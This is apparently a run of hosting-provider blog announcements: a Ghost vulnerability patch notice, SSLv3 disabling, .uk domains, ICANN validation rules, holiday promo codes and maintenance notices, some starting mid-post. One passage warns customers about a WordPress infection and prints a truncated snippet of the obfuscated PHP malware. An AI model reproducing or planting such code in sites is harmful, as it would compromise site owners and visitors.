This security issue is a critical one and affects an enormous number of systems on the Internet. Due to its seriousness and its widespread possible affect, there is a large amount of media coverage that you can look to if you would like to find out more information about Ghost:

• Scary ‘Ghost’ vulnerability leaves Linux systems vulnerable to possession
• GHOST, a critical Linux security hole, is revealed
• Highly critical “Ghost” allowing code execution affects most Linux systems

or simply do a search for “Ghost vulnerability”.

We want to let you know that at this time, all shared servers, as well as Cloud VPS and Dedicated Servers that we have access to have been patched for this vulnerability. As long as you have not manually/by choice removed our access keys, your server will have been patched in our update and you don’t have anything to worry about.

If you manage your own server and have removed our access, we are unable to secure your machine for you. We encourage you to patch this issue immediately, as the security issue is a critical one. If you have any questions, or would like to add our access back so that we can secure your server against this vulnerability for you, please contact support.

If you would like to verify and test your server yourself, there is a pretty comprehensive article over at the nixCraft blog on how to test and patch a variety of Linux Distributions.

For our hosting customers, we want to let you know that we are disabling SSL v3 on all our servers to ensure your site’s security. Most people should not experience any issues as a result of the changes we’re making – Google estimates this change will affect less than 1% of the internet as the SSL 3.0 protocol is almost 15 years old, but has remained in place to support users running older browsers.

Check out Google’s Security blog for details on how Windows XP or IE6 are vulnerable to malicious code exploiting this problem.

You should also take steps to protect yourself and your browser from the flaw just to be safe. If you are using IE6, you will need to update your version of IE, or consider switching to Chrome or Firefox, to access our services–and to protect yourself and the websites you visit.

If you are using the latest version of Firefox, they will be disabling SSL v3 in their November 25th Firefox update by default, but you don’t have to wait for that update. Mozilla has created a plugin that will allow you to set the minimum SSL version that Firefox will accept, and you can grab it here:

https://addons.mozilla.org/en-US/firefox/addon/ssl-version-control/

To turn off SSLv3 support in Internet Explorer 11:

Setting -> Internet Options -> Advanced Tab -> Uncheck “SSLv3″ under “Security”.

What It Looks Like
The infected PHP code is very buggy and is corrupting legitimate website files, as well as themes and plugin files, which causes PHP errors to be displayed instead of website content:

Parse error: syntax error, unexpected ‘)’ in /home/user/public_html/site/wp-config.php on line 91

After removing the infecting malware, the only way to remedy the issues is to restore the corrupted files from a backup. This is what the malware code looks like:

< ?php $pblquldqei = ’5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%xq%x5c%x7825%x5?c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q7825)3?of:opjudovg< ~%x5c%x7824!%x5c%x782421787825!|!*!***b%x5c%x7825)…

If you are running MailPoet, we recommend upgrading it to the latest version. If you do not have a firewall on your website, you have to upgrade the plugin or remove it altogether to avoid more issues.

Support
If you aren’t able to fix the issue on your end, please don’t hesitate to contact Support. We’re happy to help.

Click here to contact Cirtex support.

Click here to contact HostV support.

We are excited to announce that starting June 10th 2014 you can register .uk domains for just $15 a year!

Here’s what you need to know about the registration process:

• If you have a unique .co.uk, .org.uk, or other similar domain, the equivalent .uk domain will be automatically reserved for you until June 10, 2019, as long as the domain remains registered.

• You can check a registrant’s rights with this handy lookup tool:
  http://www.dotuklaunch.co.uk/rights-lookup-tool.
• If you want to register a 2nd level .uk domain, such as ‘example.uk’, then the contact info for that domain must be an exact match to the existing equivalent third level .uk domain, like ‘example.co.uk’ or ‘example.org.uk’. If the information is not the same the registration will fail.
• If there is no equivalent domain with rights already existing within the .uk domain family, by registering the .co.uk you will automatically have the right to register the new .uk domain.

Note: if your third level .uk domain name resides at a registrar other than OpenSRS, Nominet will email the registrant to confirm the registration.

We think this new easier-to-use domain extension is a great addition to our current offerings and we’re pleased to be able to offer it to you! Please contact our Billing department for assistance with registering a new domain name, or if you have any questions regarding the registration process.

Please read this important announcement carefully!  The following post details new regulations and procedures for ICANN’s Registrar Accreditation Agreement:

VALIDATING REGISTRANT E-MAIL ADDRESSES

Starting in January, the registrant contact will need to be validated upon the purchase or transfer of a domain name or if the registrant’s first name or last name has been modified.

Should any of these occur, OpenSRS , our registrar, will send an email requiring an affirmative response from the registrant. Failing to receive an affirmative response from the registrant within 15 days will result in the suspension of the name. This means that the domain (and any related services) will be offline.

If a registrant has already validated their contact information, this process will not be initiated.

The same validation process will take place if a WHOIS Data Reminder Policy (WDRP) notice, 30 day expiration notice or 5 day expiration notice bounces. It is extremely important to ensure the WHOIS data that you provide for your domain is correct.

ICANN WEBSITE REQUIREMENTS

ICANN now requires that we  list the following new pieces of information on your website:

• ICANN’s Registrant’s Benefits and Responsibilities

• ICANN’s site for registrant education

We hope that these changes in ICANN policy will have little effect on the ease in which you are able to order domain registrations or transfers. If you need assistance, or have any questions or concerns, contact Cirtex billing here, and HostV billing here. 

These operations are expected to be fully transparent and they shouldn’t cause any noticeable downtime. If you notice any connections issues after this maintenance is done, please contact our Support department.

These operations are expected to be fully transparent and they shouldn’t cause any noticeable downtime. If you notice any connections issues after this maintenance is done, please contact our Support department.

BLACK FRIDAY/CYBER MONDAY DEALS!

Black Friday and Cyber Monday are here, and Cirtex + HostV are offering great deals for two days only!

@CirtexHosting:

Get 50% off your 1st invoice on all Shared and Reseller plans!
Use the code HOSTGIVING!
Check out our Shared plans.
Check out our Reseller plans.

Get 50% off your 1st invoice on all Business plans!
Use the code BIZSALE!
Check out our Business plans.

@HostV:
Deals on VPS, Hybrid, and Dedicated Hosting.

Need to expand to a larger hosting solution?

Get 2x memory and bandwidth when you buy ANY VPS or Hybrid plan!
No code needed!
Check out our VPS plans. 
Check out our Hybrid plans. 

Get 35% off your 1st invoice on all Dedicated plans with the code DEDISALE!
Check out our Dedicated plans. 

All offers good Friday, November 29, and Monday December 2 ONLY!

This will take place on Nov 27th 10:00 – 10:30 PM EST

In doing so, we will place all affected virtual machines into an in-memory paused state and then un-pause them once the switch-over has successfully taken place to ensure that there are no complications or data corruption due to the switch. This is the safest method to perform the required maintenance, as in-memory pausing of virtual machines will temporarily suspend disk I/O ensuring data integrity is not affected.

The switch-over process is expected to last no more than 15 minutes during which time virtual machines affected will be inaccessible while in a paused state. Once the virtual machine is un-paused, the server will resume from its last state, uninterrupted, with no reboot or loss of uptime visible to the virtual machines OS or applications.

Customers directly affected by this maintenance will be receiving an email shortly outlining this information. If you do not receive an email by 3pm this afternoon, this emergency maintenance does not affect your instance.

If you have any questions about this maintenance, please let us know.

The maintenance process will require a temporary outage in which we must switch-over from the SAN primary replication unit to the standby secondary unit. In doing so, we will place all affected virtual machines into an in-memory paused state and then un-pause them once the switch-over has successfully taken place. We apologize for any inconvenience, but this is the safest method to perform the required maintenance. In-memory pausing of virtual machines will temporarily suspend disk I/O and will ensure that data integrity is not negatively affected by the maintenance.

The switch-over process is expected to last no more than 15 minutes. During this time, your virtual machine will be inaccessible while in the paused state. Once the virtual machine is un-paused, the server will resume from its last state, uninterrupted, with no reboot or loss of uptime visible to the virtual machines OS or applications.

Those affected by this maintenance should have received an email this afternoon alerting them to the maintenance. Please let our support department know if you have any questions, and we’ll be happy to help.